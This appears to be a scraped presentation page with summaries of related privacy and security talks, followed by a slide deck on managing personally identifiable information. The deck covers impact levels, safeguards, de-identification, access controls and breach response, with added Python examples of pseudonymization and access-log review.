- Identity is complex, personal yet relates to broader groups, and can change based on one's circumstances. It is fluid and affected by broader social changes.
The document provides an overview of an upcoming presentation on the General Data Protection Regulation (GDPR). It begins with introductions and disclaimers from the presenter and VMware. It then outlines the areas that will be covered in the 30 minute presentation, including timeframes for GDPR compliance, key changes from the previous Data Protection Directive, myths about GDPR requirements, potential fines, and VMware products that can help with GDPR compliance.
This document discusses various theories around identity and representation. It explores how identity is constructed through systems of representation rather than reflecting an inherent reality. Representation is shown to produce meanings and understandings of the world rather than being a neutral reflection. Different artists are discussed who investigate ideas of fluid and performed identity, including Cindy Sherman who adopts various roles to show how identity is constructed. The male gaze and objectification of the female body are also examined as ways that representation can shape understandings of gender and sexuality.
Identity and access management (IAM) involves managing user accounts, access to systems and applications, and user lifecycles. It encompasses provisioning, managing, and removing access when employees join, change roles, or leave an organization. IAM aims to streamline access management, improve security and compliance, and integrate user data across different systems using standards like LDAP, RBAC, SSO and federation. Successful IAM requires aligning technical solutions with business processes, change management, and ongoing auditing to ensure appropriate access controls.
Geek Sync | Tackling Key GDPR Challenges with Data Modeling and Governance (IDERA Software)
You can watch the replay for this Geek Sync webcast in the IDERA Resource Center: http://ow.ly/tLtr50A5b4b
The General Data Protection Regulation (GDPR) is inevitable and goes live in the EU beginning May 25th 2018. It touches all technical and organizational measures as well as the design of internal systems and processes, and affects all companies around the world that have customers in the EU.
Join IDERA and Dr. Sultan Shiffa as he focuses on how data modeling, governance and collaboration help Executives, IT Managers, Architects, DBAs and Developers tackle the key challenges around data protection by design and by default, individual rights to access and erasure, valid consent, data protection roles and accountabilities, data breach notifications, and auditing the records of data processing activities. This session will also explore best practices and examples for how to master those challenges and assess the data protection impact. After this session, you can be prepared to become GDPR compliant ahead of the deadline and beyond.
The document provides an overview and agenda for a conference on achieving compliance with the General Data Protection Regulation (GDPR). It discusses key aspects of GDPR compliance including identifying personal data, data subject rights, security requirements, international data transfers, and remedies for non-compliance. Various vendors also present on how their products can help organizations meet GDPR requirements through features such as digital consent management and customizable reporting on personal data. An example case study highlights how one company used DocuSign to address challenges around manual processes, GDPR readiness, and security of personal information.
The document discusses social and cultural identities. It defines identity as a self-image derived from socialization, and cultural identity as symbolic behaviors meaningful to a group. Some key identities discussed are racial, ethnic, gender, national, regional, organizational, and personal identities. It also covers cyber/fantasy identities and the dark side of identities such as stereotyping, prejudice, and ethnocentrism.
This document provides an overview of the costs associated with data breaches. It begins by introducing the speakers and the agenda. It then discusses what constitutes a data breach and the types of data that may be exposed, such as PII, PHI, intellectual property, and financial information. The document explores the various direct and indirect costs of a breach for different entities. It provides examples of cost estimates from past breaches, which range from thousands to over $170 million depending on the size and type of breach. Patterns in breach cost data are examined, though correlations are weak. Overall, the document deconstructs the complexities involved in understanding and estimating the full costs of a data breach.
This document provides an overview of the costs associated with data breaches. It begins by introducing the speakers and the agenda. It then discusses what constitutes a data breach and the types of data that may be exposed, such as PII, PHI, intellectual property, and financial information. The document outlines direct and indirect costs of breaches, including response costs, lost productivity, fines, and reputation damage. It provides estimates of costs from studies and actual breaches, which range from hundreds of thousands to over $170 million depending on the size and type of breach. Patterns in breach cost data are discussed. The document aims to help organizations understand and plan for the potential financial impact of a data security incident.
The document discusses PIPEDA, Canada's private sector privacy law, and the importance of having an Incident Response Plan (IRP) to respond to data breaches. It provides an overview of PIPEDA's 10 fair information principles and requirements regarding data breaches. It emphasizes that an IRP outlines the steps to detect, respond to, and reduce the risk of future incidents. It also stresses engaging legal counsel to maintain privilege and avoid liability when developing, implementing, and responding to breaches according to the IRP.
3rd Party Risk: Practical Considerations for Privacy & Security Due Diligence (Resilient Systems)
This document provides an overview of 3rd party risk due diligence best practices for privacy and security. It discusses using questionnaires and on-site reviews to assess 3rd party vendors. It also addresses considerations for evaluating foreign service providers, such as the scope of services, data sensitivity, geographic factors, business continuity, local laws, legal risks, and security controls. The document provides examples of key questions to include in a questionnaire and areas to focus on during an on-site review.
This document summarizes a seminar on cybersecurity insurance. It discusses the presenters and provides examples of data breach headlines. It then explains the threats to data, including internal and external threats. The document outlines the immediate expenses of a data breach such as notification, call centers, credit monitoring, legal expenses, and forensics. Finally, it discusses the typical costs of a data breach, which can range from hundreds of thousands to millions of dollars depending on the size and type of breach.
Next Dimension and Siskinds PIPEDA Legislation Updates as of November 1 2018 (Next Dimension Inc.)
Siskinds, a leading Law Firm in Ontario, presented updates on PIPEDA legislation including what you need to know, and what you need to do in order to ensure your company is compliant.
This document discusses insider threats in healthcare organizations. It defines an insider threat as a person with access to an organization's assets, information, or systems who could use that access to negatively impact the organization. The document outlines different types of insider threats including careless workers, malicious insiders, disgruntled employees, and third parties. It also discusses key risks, indicators of insider threats, real world examples, and methods for preventing, detecting, and responding to insider threats.
Crossing the streams: How security professionals can leverage the NZ Privacy ... (Chris Hails)
Security professionals often struggle with the ‘double intangibility’ of security - the intangibility of risk and intangibility of protection.
Changing hearts and minds often requires legislation and new compliance frameworks to motivate investment.
New Zealand's new Privacy Act comes into play on 1st December 2020 and there are ways security professionals can leverage new aspects including mandatory breach notifications to focus efforts on securing personal information and preventing privacy harms.
The document discusses security awareness and the growing threat of cyber attacks and data breaches. It notes that malware has become more sophisticated, targeting data and businesses rather than just PCs. The impacts of data breaches can include high costs for businesses. It recommends practicing defense in depth across networks, endpoints, and security tools to balance risk and costs. Cyber/privacy breach insurance can help cover liabilities and costs imposed by laws and regulations in the event of a security incident.
The document provides an overview of data breaches based on an analysis of publicly disclosed breach incidents from 2005 to 2015. It finds that while large, "sensational" breaches receive headlines, the majority of breaches are smaller in size. The most common methods of breaches are hacking and theft, while the most compromised records are personal identifying information. Healthcare, government, retail, and financial organizations are most commonly affected. Defenses against breaches are an ongoing challenge as attacks increase in sophistication over time.
Securing Your "Crown Jewels": Do You Have What it Takes? (IBM Security)
Securing Your "Crown Jewels": Do You Have What it Takes to Go From Start to Finish?
Protecting Your Most Valuable Data: Organizations face many data protection challenges, but one of the biggest is identifying and prioritizing the 0.01% - 2% of the data that is most important to your organization's survival and success. IBM Data Security Services can help by providing you with a 5-stage strategy designed to ensure that your "Crown Jewels" are protected and kept safe from loss, hackers, and being compromised. Attend this session and learn about processes to identify and prioritize your critical data, and services available from IBM to protect it.
Stop occupational fraud - Three simple steps to help stop fraud (Wynyard Group)
Three simple steps can help companies counter internal fraud: 1) be proactive in identifying fraud risks through education and enforcing policies; 2) strengthen employment policies such as background checks and monitoring employee behavior; 3) employ data analytics tools to quickly analyze large amounts of data to identify suspicious patterns and mitigate risks early before significant damage occurs. Wynyard provides powerful software and analytics to help identify fraud and protect organizations.
FireEye Cyber Defense Summit 2016 Now What - Before & After The Breach (FireEye, Inc.)
Recognize the business impact, own the risk, educate stakeholders, and prepare the organization for the breach. The document discusses the average costs of data breaches, quantifiable and difficult to measure impacts of incidents, and intangible impacts on consumer confidence and public perception. It emphasizes directly engaging stakeholders, understanding business needs, communicating risk effectively, having incident response plans, security controls, and ongoing monitoring to prepare for an inevitable breach.
The document discusses preparing for and responding to cybersecurity incidents and data breaches. It provides an overview of Breach Education Alliance, an integrated team approach for responding to breaches. It then discusses best practices for security investigations, including establishing goals and understanding common causes of incidents. Potential mistakes in investigations and security are outlined. The document emphasizes training employees, understanding your environment and business risks, and having the proper resources in place before, during and after a security incident.
2011 Hildebrandt Institute CIO Forum data privacy and security presentation... (David Cunningham)
The document discusses a presentation on leveraging IT in times of fiscal restraint to support evolving law firm business models, with specific focus on data privacy and security risk management and competitive advantage. Speakers include CISOs and IT risk managers from law firms who cover topics like data regulations, examples of regulated data, information security roles, ISO 27001 certification, audits, components of information security programs, service provider management, and contractual controls. The presentation then ends with a question and answer session.
Panel Cyber Security and Privacy without Carrie Waggoner (mihinpr)
The panel discussed security and privacy in healthcare. Some key points:
- 43% of all 2011 security breaches began in healthcare according to Symantec.
- Medical records are valued at $50 each on the black market, much more than credit cards.
- Top threats to healthcare security are malware, automatic log-off not being used, and removable media.
- HIPAA compliance does not ensure security. Access must be controlled and critical data identified.
- Presenters provided overviews of trust frameworks, Direct secure messaging between providers, and the role of digital certificates in authentication. Ensuring security requires addressing both technical and human factors.
Managing Personally Identifiable Information (PII)
2. What is PII?
Personally Identifiable Information (PII) is any information, maintained by a company, which:
• can be used to distinguish or trace an individual's identity
• is linked or linkable to an individual
Examples of PII:
• Name, Address, SSN, Date of Birth, Phone Number
• Device-specific static identifier (e.g., IP Address, UDID, etc.)
• Logs of user actions
• Financial, Employment or Location data
Page: 2
3. PII Data Breaches (2010/2011)
[Figure: > 77M users]
[Figure: 32M users]
45 out of 51 companies surveyed had a data breach in 2010 (Symantec sponsored study carried out by Ponemon Institute)
5. PII and the Law
US Government Actions:
• Federal Grand Jury investigating mobile apps and the data they transmit about user actions
• Boucher-Stearns draft bill
• Rush: Best Practices Act of 2011 (draft)
• Pending/current state laws & rules regulating use of PII
6. Other Impacts of a PII Breach
• Loss of customers
• Revenue loss
• Drop in customer confidence
• Adverse publicity
• Departure of key employees
[Image: Sony executives apologize after recent data breach]
Average cost per compromised record: $266
7. Steps to Managing PII
Assess Confidentiality Impact Levels for PII collected and used by the organization
Implement Appropriate Controls:
• Operational Safeguards
• Privacy Safeguards
• Security Controls
Prepare Incident Responses for Data Breaches
8. Confidentiality Impact Levels - I
The confidentiality of PII should be protected based on its impact level. Items of PII which do not need protection include:
• Publicly available information (phone book)
• Information voluntarily shared/disclosed
• Information that the organization has permission or authority to release publicly
Assess the harm caused by a breach of confidentiality:
• Individual Harm: Relates to adverse effects experienced by an individual when a breach of confidentiality occurs with their PII
• Organizational Harm: This may take the form of financial losses, loss of public reputation and public confidence, legal liability and additional administrative work
9. Confidentiality Impact Levels - II
Impact Type            | LOW                  | MODERATE                                                       | HIGH
Mission capability     | Limited Degradation  | Significant Degradation                                        | Severe Degradation
Organizational Assets  | Minor Damage         | Significant Damage                                             | Major Damage
Financial Loss         | Minor                | Significant                                                    | Major
Harm to Individuals    | Minor                | Significant; does not involve loss of life or serious injuries | Catastrophic; involves loss of life or serious injuries
10. Confidentiality Impact Levels – III
The following factors must be considered while determining impact levels:
Identifiability: Evaluate how easily PII can be used to identify specific individuals
• SSNs can uniquely and directly identify individuals (High)
• Zip Code or Date of Birth can significantly narrow a list (Moderate)
Quantity of PII: Consider how many individuals are identified in the information
• 25 records (Low) versus 2 million records (High)
Data Field Sensitivity: Evaluate the sensitivity of each individual PII data field as well as the sensitivity of the fields together
• An individual's SSN is more sensitive than his phone number
• A combination of name and address is more sensitive than either one by itself
• Some data fields have higher potential for harm when used in contexts other than their intended use. E.g., mother's maiden name and place of birth are often used to recover account passwords
11. Confidentiality Impact Levels - IV
Context of Use: This is the purpose for which PII is collected and used
• E.g., providing services, behavioral analysis, evaluation of preferences, serving up ads, statistical analysis or law enforcement
• Important for understanding how disclosure can harm individuals and the organization
• Relevant to evaluating impact to different categories of people – a list of newsletter subscribers compared to a list of law enforcement officers
Obligation to Protect Confidentiality:
• There may be legal or contractual obligations to protect PII. The collected PII may be assigned higher impact levels as a result
Access to and Location of PII: Factors to consider:
• Number of people who have access to PII
• Frequency of access
• Remote, offsite or offshore access or backups
• Accessed or carried around by mobile workers
12. Operational Safeguards
Create Policies and Procedures in the following areas:
• Access Rules for PII
• PII Retention Schedules and Procedures
• PII Incident and Data Breach Notification
• Privacy in the SDLC process
• Limitation of collection, disclosure, sharing and use of PII
• Consequences for failure to follow these policies
Training and Education:
• Designed to change behavior or reinforce PII practices
• Focus attention on protection of PII
• Updates on the latest scams and breaches and their impacts
• Examples of how staff involved in inappropriate actions have been held accountable
• Examples of recommended practices
• Specific role-based training
13. Privacy Safeguards - I
Minimize the Collection, Use and Retention of PII. This is the "minimum necessary" principle
• Collect only those items of PII which are essential to meet the organization's business purpose
• If PII serves no current purpose, then it should no longer be collected and used
• Check if previously collected PII is still relevant and necessary. If not, then the PII must be properly destroyed. Ensure that destruction conforms to any legal or contractual requirements
Conduct a Privacy Impact Assessment (PIA). This is a structured process to identify confidentiality risks at every stage of the SDLC. Collect details of:
• PII to be collected
• Reason for collecting this PII
• The intended use of the PII
• How the PII will be secured
14. Privacy Safeguards - II
De-Identifying Information:
• Full data records are not always required. E.g., correlations, trend analysis
• Obscure enough PII so that the remaining information does not identify an individual
• May be re-identified via a code or algorithm assigned to each record
• The re-identifying code or algorithm should not be derived from other related information about the individual
• Means of re-identification should only be known to authorized staff and not disclosed to anyone without the authority to re-identify records
• Can be assigned a PII confidentiality impact level of LOW provided the following conditions are both true:
  – The re-identification algorithm or code is maintained in a separate system, with controls to prevent unauthorized access; and
  – The data elements are not linkable, via public records or other reasonably available external records, in order to re-identify the data
15. Privacy Safeguards - III
Anonymized Information:
• De-identified information for which a code or algorithm for re-identification no longer exists
• Information is no longer PII
• Usually involves application of disclosure limitation techniques like:
  Generalizing the Data – making information less precise
  Suppressing the Data – deleting an entire record or certain parts of a record
  Introducing Noise – adding small amounts of variation into selected data
  Swapping Data – exchanging data fields of one record with the same data fields of another similar record (e.g., swapping ZIP codes of two records)
  Replacing data with the average value – replacing a selected value of data with the average value for the entire group of data
• Useful for system testing since realistic properties are retained
Caution: PII used in test environments requires the same level of protection as in the production environment
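The de-identification of slide 14 and the anonymization techniques of slide 15, as an added Python example that is not part of the original deck: pseudonymize() attaches a random token that is not derived from the person's data and returns the re-identification key separately so it can live on its own access-controlled system, while anonymize() applies the slides' disclosure-limitation techniques and keeps no key. The record fields, the 3-digit ZIP area used to pick "similar" records for swapping and the ±1 noise range are assumptions, and the sample records are constructed.

```python
import random
import secrets
import statistics

# Constructed sample records (hypothetical people, not real data).
RECORDS = [
    {"name": "Ann Lee", "zip": "10001", "age": 34, "salary": 52000, "visits": 3},
    {"name": "Bo Kim",  "zip": "10002", "age": 41, "salary": 61000, "visits": 7},
    {"name": "Cy Roe",  "zip": "94105", "age": 29, "salary": 48000, "visits": 1},
    {"name": "Di Fox",  "zip": "94107", "age": 55, "salary": 75000, "visits": 5},
]
DIRECT_IDENTIFIERS = ("name",)

def pseudonymize(records):
    """De-identify: drop direct identifiers, attach a random token (CSPRNG, not
    derived from the person's data, so it cannot be recomputed from other facts
    about them). The returned key is the means of re-identification and belongs
    on a separate, access-controlled system, never beside the de-identified set."""
    deid, key = [], {}
    for rec in records:
        token = secrets.token_hex(8)
        key[token] = {k: rec[k] for k in DIRECT_IDENTIFIERS}
        deid.append({"id": token, **{k: v for k, v in rec.items()
                                      if k not in DIRECT_IDENTIFIERS}})
    return deid, key

def reidentify(deid, key):
    """Only the key holder can link records back to individuals."""
    return [{**key[r["id"]], **{k: v for k, v in r.items() if k != "id"}}
            for r in deid]

def anonymize(records, seed):
    """Apply the slides' disclosure-limitation techniques; no key is kept."""
    rng = random.Random(seed)  # seeded only so the example is reproducible
    mean_salary = round(statistics.mean(r["salary"] for r in records))
    by_area = {}  # swapping: exchange ZIP codes within the same 3-digit area
    for r in records:
        by_area.setdefault(r["zip"][:3], []).append(r["zip"])
    swapped = {area: z[::-1] for area, z in by_area.items()}
    anon = []
    for r in records:
        band = r["age"] // 10 * 10
        anon.append({                                   # suppression: no "name"
            "age": f"{band}-{band + 9}",                # generalizing
            "salary": mean_salary,                      # replacing with average
            "visits": r["visits"] + rng.randint(-1, 1), # introducing noise
            "zip": swapped[r["zip"][:3]].pop(0),        # swapping
        })
    return anon
```

Because the key is a random mapping rather than a hash of the name, someone holding the de-identified set plus other facts about a person still cannot compute that person's token.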
16. Security Controls - I
Specific security controls should be established to ensure confidentiality of PII
Access Controls:
• Identification and Authentication: Users must be uniquely identified and authenticated prior to accessing PII. Typically, two-factor authentication is required as well as a time-out function for remote access
• Enforcement: Control access to PII through role-based access control to allow each user to only access pieces of data necessary for the user's role; or allow access only through an application which tightly restricts access to PII
• Least Privilege: Ensure that users only have access to the minimum amount of PII, along with those privileges – read, write, execute – that are necessary to perform their work
• Remote Access: Prohibit or strictly limit access to PII. If remote access is permitted, ensure that the communications are encrypted
• Mobile Devices: Prohibit or strictly limit access to PII from portable or mobile devices because these are generally higher-risk than non-portable devices. If access is permitted, ensure devices are properly secured with up-to-date anti-malware software and OS patches
• Media Access: Restrict access to media (CDs, USB flash drives, tapes, paper, etc.) containing PII
17. Security Controls - II
Separation of Duties: Enforce separation of duties for roles involving access to PII. For example, users of de-identified data should not also be in roles that permit them to access the codes needed to re-identify the records
Monitoring and Audits:
• Monitor all access to PII to detect unauthorized access events or attempts
• Monitor PII internally or at network boundaries for unusual or suspicious data transfers
• Regularly review and analyze system logs for indications of inappropriate or unusual activity affecting PII and investigate suspicious activity or suspected violations
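Role-based enforcement from slide 16 together with the separation-of-duties rule and the log review of slide 17, as an added Python example that is not the deck's own code: sod_violations() finds users holding the de-identified-data role and the re-identification-key role at once, and review_logs() flags reads a role does not permit plus unusually large transfers. The role model, the conflict pair, the access-log format and the log lines are all constructed assumptions.

```python
import re

# Constructed role model (hypothetical): the PII fields each role may read.
ROLE_PERMISSIONS = {
    "analyst": {"age", "zip"},             # works only on de-identified data
    "key_custodian": {"reid_key"},         # holds the re-identification codes
    "support": {"name", "email"},
}
# Role pairs that separation of duties says one person must never hold together.
SOD_CONFLICTS = [("analyst", "key_custodian")]
LOG_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) action=(?P<action>\S+) "
                    r"field=(?P<field>\S+) count=(?P<count>\d+)$")

def sod_violations(user_roles):
    """Users who hold both roles of any conflicting pair."""
    return sorted(user for user, roles in user_roles.items()
                  if any({a, b} <= roles for a, b in SOD_CONFLICTS))

def authorized(roles, field):
    """Role-based check: may any of the user's roles read this field?"""
    return any(field in ROLE_PERMISSIONS.get(role, set()) for role in roles)

def review_logs(lines, user_roles, bulk_threshold=1000):
    """Flag PII reads a role does not permit, unusually large transfers,
    and log lines the parser cannot account for (those need a look too)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            findings.append(("unparsed", line))
            continue
        user, field, count = m["user"], m["field"], int(m["count"])
        if not authorized(user_roles.get(user, set()), field):
            findings.append(("unauthorized", user, field))
        if count >= bulk_threshold:
            findings.append(("bulk_transfer", user, field, count))
    return findings

# Constructed sample data: role assignments and an access log (not real).
USER_ROLES = {"alice": {"analyst"}, "bob": {"analyst", "key_custodian"},
              "carol": {"support"}}
ACCESS_LOG = [
    "2024-01-05T09:12:00Z user=alice action=read field=zip count=20",
    "2024-01-05T09:15:00Z user=carol action=read field=name count=1",
    "2024-01-05T22:40:00Z user=carol action=export field=name count=5000",
    "2024-01-05T10:01:00Z user=alice action=read field=name count=1",
    "corrupted line",
]
```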
18. Security Controls - III
Media Handling:
• Marking: Label media containing PII to indicate how it should be distributed and handled
• Storage: PII on paper or on digital media must be securely stored until it is destroyed or sanitized. For example, encrypt data stored on storage drives, backup tapes and removable media
• Transport: Protect media and mobile devices containing PII that are transported outside the organization's controlled areas
• Sanitization: Sanitize media containing PII before it is disposed of or released for reuse
Information Transmission: Protect the confidentiality of transmitted PII either by encrypting the communications or by encrypting the information before it is transmitted
19. Incident Responses - I
Breaches involving PII must be handled differently from other incidents because there are specific features and risks associated with breaches involving PII which may not be associated with other incidents.
Preparation
• Integrate response plans for PII breaches into existing incident response plans.
• Train the entire staff on policies and procedures
• Carry out simulation exercises to evaluate whether existing procedures are adequate and to assess whether staff are able to perform their roles as required
• Employees must clearly know how to identify a PII breach and what information about the breach needs to be reported
• Employees must be able to report any breach involving PII immediately, 24x365
• Identify a person or committee (named members) responsible for coordinating the organization's response
20. Incident Responses - II
Information to be collected about a Breach
• Person reporting the incident
• Person who discovered the breach
• Date and time the breach was discovered
• Nature of the incident
• Name of system and possible interconnectivity with other systems
• Description of information lost or compromised
• Controls in place to prevent unauthorized use of compromised information
• Number of individuals potentially affected
• Storage medium from which information was compromised
• Whether law enforcement was contacted
Elements of Breach Notification plans
• Whether notification to affected individuals is required
• Timeliness of the notification
• Source of the notification
• Contents of the notification
• Means of providing the notification
• Who receives the notification; public outreach response
• What actions were taken and by whom
21. Incident Responses - III
Breach Detection & Analysis
• Evaluate all incidents to check if a breach of PII is involved
Containment, Eradication & Recovery
• Media sanitization may be required when PII is deleted during recovery from a breach
• Check if PII needs to be preserved for evidence; check with legal counsel prior to sanitizing PII
• Use forensics techniques to ensure preservation of evidence
• Determine whether PII was accessed and how many records or individuals were affected
Post-incident Activity
• Conduct retrospective analysis to gather key lessons
• Share information and lessons learned within the organization as well as with external agencies as required.
• Update incident response plan as required